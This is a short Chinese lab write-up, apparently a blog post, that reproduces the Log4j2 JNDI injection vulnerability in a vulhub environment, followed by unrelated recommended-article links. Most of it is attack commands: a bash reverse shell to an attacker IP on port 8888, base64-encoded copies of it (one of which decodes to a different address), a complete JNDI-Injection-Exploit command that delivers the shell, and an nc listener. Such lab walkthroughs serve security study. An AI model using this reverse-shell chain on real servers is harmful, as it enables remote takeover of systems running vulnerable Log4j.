vulhub靶场log4j2漏洞复现

嘤嘤奶嘴酱2024-09-09 1:38

开启环境

进入主页

在DNSLOG平台上获取⼀个域名来监控注⼊

开始反弹Shell,下载一个JNDI-Injection-Explo到攻击机

bash -i >& /dev/tcp/192.168.10.233/8888 0>&1

反弹base64加密

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xMy82NjY2IDA+JjE=

最终payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=

}|{base64,-d}|{bash, -i}" -A "192.168.10.233"

监听nc -lvvp 8888

使用jdk1.8的payload直接访问

相关推荐
哇哈哈&2 小时前
gcc9.2的离线安装,支持gcc++19及以上版本
linux·运维·服务器
一条咸鱼¥¥¥3 小时前
【运维经验】使用QQ邮箱SMTP服务器设置ssms计划任务完成时邮件发送
运维·服务器·经验分享·sql·sqlserver
【上下求索】3 小时前
学习笔记095——Ubuntu 安装 lrzsz 服务?
运维·笔记·学习·ubuntu
菜鸟plus+3 小时前
N+1查询
java·服务器·数据库
Caster_Z5 小时前
WinServer安装VM虚拟机运行Linux-(失败,云服务器不支持虚拟化)
linux·运维·服务器
小小测试开发5 小时前
提升WebUI自动化效率与性能:从脚本到架构的全链路优化指南
运维·架构·自动化
中屹指纹浏览器6 小时前
指纹浏览器抗检测进阶:绕过深度风控的技术实践
服务器·网络·经验分享·笔记·媒体
The star"'6 小时前
mysql(1-3)
运维·mysql·云计算
model20056 小时前
Alibaba linux 3安装LAMP(5)
linux·运维·服务器
weixin_307779137 小时前
Jenkins中的Jakarta Activation API插件:功能、使用与最佳实践
运维·开发语言·ci/cd·自动化·jenkins
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03【AutoGLM部署】本地私有化部署AI手机Agent04UV安装并设置国内源05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Linux下V2Ray安装配置指南07Open-AutoGLM Windows 安装部署教程08BongoCat - 跨平台键盘猫动画工具09React CVE-2025-55182漏洞排查与修复指南10在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)